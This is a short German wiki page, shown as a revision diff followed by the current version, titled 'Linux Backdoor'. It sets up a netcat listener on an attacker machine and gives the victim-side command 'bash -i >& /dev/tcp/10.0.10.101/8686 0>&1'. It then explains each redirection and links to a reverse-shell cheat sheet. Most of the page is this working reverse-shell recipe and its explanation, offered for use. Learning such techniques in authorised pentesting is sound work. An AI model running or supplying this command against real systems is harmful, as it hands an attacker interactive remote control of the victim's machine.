Linux Backdoor: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→Opfer) |
|||
| Zeile 2: | Zeile 2: | ||
IP Angreifer 10.0.10.101 | IP Angreifer 10.0.10.101 | ||
*netcat -lp 8686 | *netcat -lp 8686 | ||
| − | |||
=Opfer= | =Opfer= | ||
*bash -i >& /dev/tcp/10.0.10.101/8686 0>&1 | *bash -i >& /dev/tcp/10.0.10.101/8686 0>&1 | ||
| + | bash -i : opens an interactive shell | ||
| + | =&>= | ||
| + | leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde | ||
| + | =0>&1= | ||
| + | Ich lese es gerne als 0<&1. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört. | ||
=Links= | =Links= | ||
*http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | *http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | ||
Version vom 13. März 2023, 18:49 Uhr
Angreifer
IP Angreifer 10.0.10.101
- netcat -lp 8686
Opfer
- bash -i >& /dev/tcp/10.0.10.101/8686 0>&1
bash -i : opens an interactive shell
&>
leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde
0>&1
Ich lese es gerne als 0<&1. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.